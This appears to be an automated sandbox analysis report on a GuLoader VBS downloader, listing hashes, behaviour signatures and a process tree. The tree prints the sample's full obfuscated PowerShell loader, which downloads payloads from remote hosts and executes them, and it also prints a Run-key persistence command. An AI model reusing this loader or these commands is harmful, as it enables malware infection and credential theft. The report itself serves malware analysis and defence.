Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    09-07-2024 18:54

General

  • Target

    b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs

  • Size

    102KB

  • MD5

    01c94fd161a6999247d5f39f63bdeecf

  • SHA1

    f5da84dd0df3da70aa7cc5167d3a870aec691bd8

  • SHA256

    b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79

  • SHA512

    ac62e8e35dff33dec16b4cb9faed77dbbe8e5b51d1576495d12aed0eb0ab81f92ae6af6087441e812a7ce9a102898ed4e5622e68b87c5d6b7b8d9999dd599a1d

  • SSDEEP

    3072:c4oGKaBSPReHzR0WAjT28fyxa+CS64B9Ou4rIQCtvfCS5x:pt7SPReHd0WoT28faa+CS64mu8IQCtv/

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 31 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 30 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 31 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\b13adc656bdc9a6425b6075e7f016debcea9cca87ccdc9faca337a03f31b4c79.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1300
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems';If (${host}.CurrentCulture) {$Dominator++;}Function Swatheable($Ethography){$Etagevaskens=$Ethography.Length-$Dominator;$Aseismic='SUBsTR';$Aseismic+='ing';For( $Sluicing=1;$Sluicing -lt $Etagevaskens;$Sluicing+=2){$Dissatisfying+=$Ethography.$Aseismic.Invoke( $Sluicing, $Dominator);}$Dissatisfying;}function Overdaadiges($Writeup227){ . ($Eftersynkroniser) ($Writeup227);}$Riffelgangen=Swatheable 'BMAoUz.i,l l a,/E5 . 0K ( W iMn d.o,wRs N Tg p1.0 . 0 ;. WFi nB6 4S;, x 6A4B;, sr,v : 1.2.1 . 0g) BGLe c.ksoA/f2 0 1m0M0 1O0,1, FSiDrFeRf o x /K1 2U1T. 0R ';$Spaltedefinition=Swatheable 'PU s eOrS- ADg.eSn t. ';$Stormhat=Swatheable 'Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>IhNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> h tht.p s :./ /DfCi,rSsUt 4.lNoPc.k s mGiMtBh sA.Bc oI. u k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z ';$Barskt=Swatheable '.>S ';$Eftersynkroniser=Swatheable ' iSeOx. 
';$Hyperpolysyllabically='Nederdrgtigeres';$Direktrstols = Swatheable 'Be,c h,o %DaJpvp dOaHtPaP%.\,CSo q u,e l.uVc,h e 1,4S.Mm,y xL V&S& Re.c hDo FtE ';Overdaadiges (Swatheable 'H$ g lHoNbtavl,:KDLozgVw o o d =H(,c m d, /.cH $ DEiKrPe.kItDr.s,t oTl s )A ');Overdaadiges (Swatheable ' $ g.l o bSa.lP: O,t.aUrRiIi.n eM= $DS tLoUr mHh a.tM.Js p lBiHt (S$ B a r sSk t )L ');Overdaadiges (Swatheable 'P[ NBe t . S.e rSv.iUc e PIo iBn.tFM aDn.a g eRr ]P: :BS,eEcNu r iItmyFP rUoWtBo cPoUl .=S [SN,eIt .HS eAcPuUriiAtAyFPKr oHthoPcSoDl T.y p eM]k: :,TSlGsA1,2a ');$Stormhat=$Otariine[0];$Maintainable= (Swatheable 'l$sgOl.oFbaaKlL:.G e nfn.eUmMsAn iEt.sPtSa lPsB=RNAe,wP-,ORbIj,eSc t NS y s,t.eHm . N eHt . W,eSb.C,l iSe n t');$Maintainable+=$Dogwood[1];Overdaadiges ($Maintainable);Overdaadiges (Swatheable 'B$ G eAn nAe m.s n i tVsSt acl.s..,HDeMa d,e,rms [ $ S p.a.lSt.e d e fCiCn i t,i,o n ].=,$SR,iMf.fDe l g.aSn gJeOnB ');$Uddunstningen=Swatheable 'A$.G e n,n e mBsTnci tBsGt,aLl s..MD,oAw nMl,oGa d FDihlFe ( $ SHtBo r m hVaAtK, $ l,o kBaTlOi sDe rPi nMgPsUpar,iMn c i pSpHe,r.nEe sD) ';$lokaliseringsprincippernes=$Dogwood[0];Overdaadiges (Swatheable ' $Cg l oSb.aIl.:URAeInMgBuOeSrMa = (ST e s tF- PSaAt hW U$BlRoSkNa.l.iDsAeMr i,n g.s p.rNi n cSirpbpAeBr.nAe s )C ');while (!$Renguera) {Overdaadiges (Swatheable '.$ gIl o bAaFlS:ML.uKf.t e nEs,=O$ t rOu.e, ') ;Overdaadiges $Uddunstningen;Overdaadiges (Swatheable ',S,tna.rPtH-US lre eTpC .4. ');Overdaadiges (Swatheable 'R$Wg l.oSb akl :SR eDn.gPu eCr,a = (LT,eUs tD-EP.aStNh B$ l o kSaul,iTs,e r i nPgSsTp r ibn cBi.pPpAe.r nSe,s,)U ') ;Overdaadiges (Swatheable ',$Sgal oObFa.lM:FU,nShBeGrUmCistDi cCa.l.lSyP= $,g lVo bRaKl,:,KRv a tDoirAi abl gFuAi nfeUaBn e,rKe n + +P%N$OO t.aTrMi i n,eD. c oSuPnLtV ') ;$Stormhat=$Otariine[$Unhermitically];}$Agnellis=370878;$Underprikket=26015;Overdaadiges (Swatheable '.$TgEl.oAbEa l :AHSmUo,sStHa sAepoTmMr a a dPe.tA F=. 
AG eIt.-.CFo n tFe n,tB R$Sl o,kAaIl,iTs e rKiSnAgSs pnr,iWn,c.iMp pKeIr nTefsB ');Overdaadiges (Swatheable 'p$KgSl o b,aAl.:IT,eFlTeMsscCoTpUiBn gD H=I ,[,S yDs,t e,m .FC o nTv e.rUt,] :O: F r.o.mTB abs e.6U4 S t,r.i n g (Q$ HDmSoSs tAa.s e.oKmUr.aTaKd e.tS), ');Overdaadiges (Swatheable '.$.gbl o b.aBlU: TLa k tVn x rN =, ,[dS,y,sDtVetm.. TSeBx tS.IE nAcUo dCi nLg ] :D:LA.SrC.I,IM.NG eLt SKtIrCiRn g (K$CTAe l e s.c,oPpLi,nfg )H ');Overdaadiges (Swatheable 'D$,gClSo bAaMlO: S.tAuTb s = $,T,a,kUt.n,xTr . sDumb sUt,r.i.n.g,(P$DAAgTnIe lAlNi.s ,f$TUFnld e rBpFr iAk kSeYtS)S ');Overdaadiges $Stubs;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3824
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coqueluche14.myx && echo t"
        3⤵
          PID:4756
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems Dissatisfying Kvatorialguineaneren Unhermitically Otariine Stormhat Revelationer Trykpladers68 Nederdrgtigeres Hmostaseomraadet kontorpersonalernes Turistbussernes Taktnxr Kommaregel Asylsager208 Torchlike Korrektiv Dubbo Dagfinn Tudekopper Tabooing nonmarriageable lokaliseringsprincippernes Micromhos Ledelsessystems';If (${host}.CurrentCulture) {$Dominator++;}Function Swatheable($Ethography){$Etagevaskens=$Ethography.Length-$Dominator;$Aseismic='SUBsTR';$Aseismic+='ing';For( $Sluicing=1;$Sluicing -lt $Etagevaskens;$Sluicing+=2){$Dissatisfying+=$Ethography.$Aseismic.Invoke( $Sluicing, $Dominator);}$Dissatisfying;}function Overdaadiges($Writeup227){ . ($Eftersynkroniser) ($Writeup227);}$Riffelgangen=Swatheable 'BMAoUz.i,l l a,/E5 . 0K ( W iMn d.o,wRs N Tg p1.0 . 0 ;. WFi nB6 4S;, x 6A4B;, sr,v : 1.2.1 . 0g) BGLe c.ksoA/f2 0 1m0M0 1O0,1, FSiDrFeRf o x /K1 2U1T. 0R ';$Spaltedefinition=Swatheable 'PU s eOrS- ADg.eSn t. ';$Stormhat=Swatheable 'Ph t t p sN:T/s/Bm,o.v.i e s.mDaRc kBtAa.l kE. c oKm /RKSoOl oTnAiGaTl vSa,r e nA. eBm,zI>IhNtKt pns.: /,/FmKiElRaLnsa,cDeJs,.OcSo m,/CKDo lTo n,i a lVv aLr e,n .UeOm z > hUtPt p :A/./C1 0R3 .R1F9,5.. 2.3Y7,.C4 3H/ K o l o nBi.a,lSvFa rAeUnF.Se,mAz.> h tht.p s :./ /DfCi,rSsUt 4.lNoPc.k s mGiMtBh sA.Bc oI. u k,/HK.oMleo.nLiFa l vIa.rPefnM. eKm.z ';$Barskt=Swatheable '.>S ';$Eftersynkroniser=Swatheable ' iSeOx. 
';$Hyperpolysyllabically='Nederdrgtigeres';$Direktrstols = Swatheable 'Be,c h,o %DaJpvp dOaHtPaP%.\,CSo q u,e l.uVc,h e 1,4S.Mm,y xL V&S& Re.c hDo FtE ';Overdaadiges (Swatheable 'H$ g lHoNbtavl,:KDLozgVw o o d =H(,c m d, /.cH $ DEiKrPe.kItDr.s,t oTl s )A ');Overdaadiges (Swatheable ' $ g.l o bSa.lP: O,t.aUrRiIi.n eM= $DS tLoUr mHh a.tM.Js p lBiHt (S$ B a r sSk t )L ');Overdaadiges (Swatheable 'P[ NBe t . S.e rSv.iUc e PIo iBn.tFM aDn.a g eRr ]P: :BS,eEcNu r iItmyFP rUoWtBo cPoUl .=S [SN,eIt .HS eAcPuUriiAtAyFPKr oHthoPcSoDl T.y p eM]k: :,TSlGsA1,2a ');$Stormhat=$Otariine[0];$Maintainable= (Swatheable 'l$sgOl.oFbaaKlL:.G e nfn.eUmMsAn iEt.sPtSa lPsB=RNAe,wP-,ORbIj,eSc t NS y s,t.eHm . N eHt . W,eSb.C,l iSe n t');$Maintainable+=$Dogwood[1];Overdaadiges ($Maintainable);Overdaadiges (Swatheable 'B$ G eAn nAe m.s n i tVsSt acl.s..,HDeMa d,e,rms [ $ S p.a.lSt.e d e fCiCn i t,i,o n ].=,$SR,iMf.fDe l g.aSn gJeOnB ');$Uddunstningen=Swatheable 'A$.G e n,n e mBsTnci tBsGt,aLl s..MD,oAw nMl,oGa d FDihlFe ( $ SHtBo r m hVaAtK, $ l,o kBaTlOi sDe rPi nMgPsUpar,iMn c i pSpHe,r.nEe sD) ';$lokaliseringsprincippernes=$Dogwood[0];Overdaadiges (Swatheable ' $Cg l oSb.aIl.:URAeInMgBuOeSrMa = (ST e s tF- PSaAt hW U$BlRoSkNa.l.iDsAeMr i,n g.s p.rNi n cSirpbpAeBr.nAe s )C ');while (!$Renguera) {Overdaadiges (Swatheable '.$ gIl o bAaFlS:ML.uKf.t e nEs,=O$ t rOu.e, ') ;Overdaadiges $Uddunstningen;Overdaadiges (Swatheable ',S,tna.rPtH-US lre eTpC .4. ');Overdaadiges (Swatheable 'R$Wg l.oSb akl :SR eDn.gPu eCr,a = (LT,eUs tD-EP.aStNh B$ l o kSaul,iTs,e r i nPgSsTp r ibn cBi.pPpAe.r nSe,s,)U ') ;Overdaadiges (Swatheable ',$Sgal oObFa.lM:FU,nShBeGrUmCistDi cCa.l.lSyP= $,g lVo bRaKl,:,KRv a tDoirAi abl gFuAi nfeUaBn e,rKe n + +P%N$OO t.aTrMi i n,eD. c oSuPnLtV ') ;$Stormhat=$Otariine[$Unhermitically];}$Agnellis=370878;$Underprikket=26015;Overdaadiges (Swatheable '.$TgEl.oAbEa l :AHSmUo,sStHa sAepoTmMr a a dPe.tA F=. 
AG eIt.-.CFo n tFe n,tB R$Sl o,kAaIl,iTs e rKiSnAgSs pnr,iWn,c.iMp pKeIr nTefsB ');Overdaadiges (Swatheable 'p$KgSl o b,aAl.:IT,eFlTeMsscCoTpUiBn gD H=I ,[,S yDs,t e,m .FC o nTv e.rUt,] :O: F r.o.mTB abs e.6U4 S t,r.i n g (Q$ HDmSoSs tAa.s e.oKmUr.aTaKd e.tS), ');Overdaadiges (Swatheable '.$.gbl o b.aBlU: TLa k tVn x rN =, ,[dS,y,sDtVetm.. TSeBx tS.IE nAcUo dCi nLg ] :D:LA.SrC.I,IM.NG eLt SKtIrCiRn g (K$CTAe l e s.c,oPpLi,nfg )H ');Overdaadiges (Swatheable 'D$,gClSo bAaMlO: S.tAuTb s = $,T,a,kUt.n,xTr . sDumb sUt,r.i.n.g,(P$DAAgTnIe lAlNi.s ,f$TUFnld e rBpFr iAk kSeYtS)S ');Overdaadiges $Stubs;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3592
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coqueluche14.myx && echo t"
            4⤵
              PID:4972
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:4100
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Algoritmiskes" /t REG_EXPAND_SZ /d "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\Coindication\').Fyrsvamp;%Paginerende% ($elektronspillets)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:1624
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Algoritmiskes" /t REG_EXPAND_SZ /d "%Paginerende% -w 1 $elektronspillets=(Get-ItemProperty -Path 'HKCU:\Coindication\').Fyrsvamp;%Paginerende% ($elektronspillets)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:4352
              • C:\Program Files (x86)\windows mail\wab.exe
                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rzbivks"
                5⤵
                  PID:2904
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 2904 -s 12
                    6⤵
                    • Program crash
                    PID:388
                • C:\Program Files (x86)\windows mail\wab.exe
                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ctganddgxs"
                  5⤵
                    PID:3272
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 12
                      6⤵
                      • Program crash
                      PID:3448
                  • C:\Program Files (x86)\windows mail\wab.exe
                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mvltovwilahgiw"
                    5⤵
                      PID:400
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 400 -s 12
                        6⤵
                        • Program crash
                        PID:3456
                    • C:\Program Files (x86)\windows mail\wab.exe
                      "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\rendl"
                      5⤵
                        PID:4264
                        • C:\Windows\SysWOW64\WerFault.exe
                          C:\Windows\SysWOW64\WerFault.exe -u -p 4264 -s 12
                          6⤵
                          • Program crash
                          PID:1636
                      • C:\Program Files (x86)\windows mail\wab.exe
                        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\uyanmfeoj"
                        5⤵
                          PID:5116
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 5116 -s 12
                            6⤵
                            • Program crash
                            PID:3076
                        • C:\Program Files (x86)\windows mail\wab.exe
                          "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\eafgnxoixvow"
                          5⤵
                            PID:1352
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 12
                              6⤵
                              • Program crash
                              PID:4436
                          • C:\Program Files (x86)\windows mail\wab.exe
                            "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\yityrwjukssqvydvandjmigzvicenqsn"
                            5⤵
                              PID:2844
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -u -p 2844 -s 12
                                6⤵
                                • Program crash
                                PID:1816
                            • C:\Program Files (x86)\windows mail\wab.exe
                              "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\jkgq"
                              5⤵
                                PID:4252
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4252 -s 12
                                  6⤵
                                  • Program crash
                                  PID:2072
                              • C:\Program Files (x86)\windows mail\wab.exe
                                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\lembkhe"
                                5⤵
                                  PID:3348
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 3348 -s 12
                                    6⤵
                                    • Program crash
                                    PID:2180
                                • C:\Program Files (x86)\windows mail\wab.exe
                                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\gtiapoyaaegbtlsibnyfqbzhygi"
                                  5⤵
                                    PID:2428
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2428 -s 12
                                      6⤵
                                      • Program crash
                                      PID:1952
                                  • C:\Program Files (x86)\windows mail\wab.exe
                                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qnnligjuwmyfesgmlxlyaguqymzijc"
                                    5⤵
                                      PID:2008
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2008 -s 12
                                        6⤵
                                        • Program crash
                                        PID:3128
                                    • C:\Program Files (x86)\windows mail\wab.exe
                                      "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\apsdiruwkvqkggcyciyalsohhtjrcnjkn"
                                      5⤵
                                        PID:4348
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 12
                                          6⤵
                                          • Program crash
                                          PID:3884
                                      • C:\Program Files (x86)\windows mail\wab.exe
                                        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\veovnxghxrveshhevumtbt"
                                        5⤵
                                          PID:1008
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1008 -s 12
                                            6⤵
                                            • Program crash
                                            PID:2676
                                        • C:\Program Files (x86)\windows mail\wab.exe
                                          "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xytnfqrblznicnvimfymegnyb"
                                          5⤵
                                            PID:4692
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 12
                                              6⤵
                                              • Program crash
                                              PID:3096
                                          • C:\Program Files (x86)\windows mail\wab.exe
                                            "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ibzygicczhfvftrmwqtoplhhbrpv"
                                            5⤵
                                              PID:4660
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4660 -s 12
                                                6⤵
                                                • Program crash
                                                PID:956
                                            • C:\Program Files (x86)\windows mail\wab.exe
                                              "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\nkailzhhjmbtbijwgfui"
                                              5⤵
                                                PID:4648
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4648 -s 12
                                                  6⤵
                                                  • Program crash
                                                  PID:3972
                                              • C:\Program Files (x86)\windows mail\wab.exe
                                                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\pefaesrjwutydoyixqhcsma"
                                                5⤵
                                                  PID:1228
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1228 -s 12
                                                    6⤵
                                                    • Program crash
                                                    PID:2756
                                                • C:\Program Files (x86)\windows mail\wab.exe
                                                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zgttfkcdkcllovumhatdvqvyewm"
                                                  5⤵
                                                    PID:1088
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1088 -s 12
                                                      6⤵
                                                      • Program crash
                                                      PID:228
                                                  • C:\Program Files (x86)\windows mail\wab.exe
                                                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ungkjjxoyzpfawy"
                                                    5⤵
                                                      PID:4556
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4556 -s 12
                                                        6⤵
                                                        • Program crash
                                                        PID:2960
                                                    • C:\Program Files (x86)\windows mail\wab.exe
                                                      "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\epmvcbhqmhhjckmwrxu"
                                                      5⤵
                                                        PID:2804
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 12
                                                          6⤵
                                                          • Program crash
                                                          PID:4852
                                                      • C:\Program Files (x86)\windows mail\wab.exe
                                                        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\hkzodusjapaomqiaiihrhr"
                                                        5⤵
                                                        • Suspicious use of UnmapMainImage
                                                        PID:2104
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 2104 -s 12
                                                          6⤵
                                                          • Program crash
                                                          PID:1660
                                                      • C:\Program Files (x86)\windows mail\wab.exe
                                                        "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\bznfhsmvvl"
                                                        5⤵
                                                          PID:1700
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1700 -s 12
                                                            6⤵
                                                            • Program crash
                                                            PID:3068
                                                        • C:\Program Files (x86)\windows mail\wab.exe
                                                          "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ltayalxwjuwuax"
                                                          5⤵
                                                            PID:1556
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1556 -s 12
                                                              6⤵
                                                              • Program crash
                                                              PID:2528
                                                          • C:\Program Files (x86)\windows mail\wab.exe
                                                            "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\wvgqadiqxcozldpwc"
                                                            5⤵
                                                              PID:1680
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 1680 -s 12
                                                                6⤵
                                                                • Program crash
                                                                PID:3296
                                                            • C:\Program Files (x86)\windows mail\wab.exe
                                                              "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\qktifk"
                                                              5⤵
                                                                PID:3292
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3292 -s 12
                                                                  6⤵
                                                                  • Program crash
                                                                  PID:4628
                                                              • C:\Program Files (x86)\windows mail\wab.exe
                                                                "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\tehsfdfdz"
                                                                5⤵
                                                                  PID:2260
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 12
                                                                    6⤵
                                                                    • Program crash
                                                                    PID:4504
                                                                • C:\Program Files (x86)\windows mail\wab.exe
                                                                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\dgmlyvqxnock"
                                                                  5⤵
                                                                    PID:3340
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3340 -s 12
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:4168
                                                                • C:\Program Files (x86)\windows mail\wab.exe
                                                                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\ipnv"
                                                                  5⤵
                                                                    PID:2436
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2436 -s 12
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:3832
                                                                • C:\Program Files (x86)\windows mail\wab.exe
                                                                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\sktnwff"
                                                                  5⤵
                                                                    PID:2696
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 2696 -s 12
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:3016
                                                                • C:\Program Files (x86)\windows mail\wab.exe
                                                                  "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\vmyyxxqfyj"
                                                                  5⤵
                                                                    PID:3932
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 3932 -s 12
                                                                      6⤵
                                                                      • Program crash
                                                                      PID:3028
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3272 -ip 3272
    1⤵
      PID:4016
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 2904 -ip 2904
    1⤵
      PID:4600
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 400 -ip 400
    1⤵
      PID:788
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 4264 -ip 4264
    1⤵
      PID:4172
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 5116 -ip 5116
    1⤵
      PID:5092
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1352 -ip 1352
    1⤵
      PID:2696
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2844 -ip 2844
    1⤵
      PID:1312
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3348 -ip 3348
    1⤵
      PID:4224
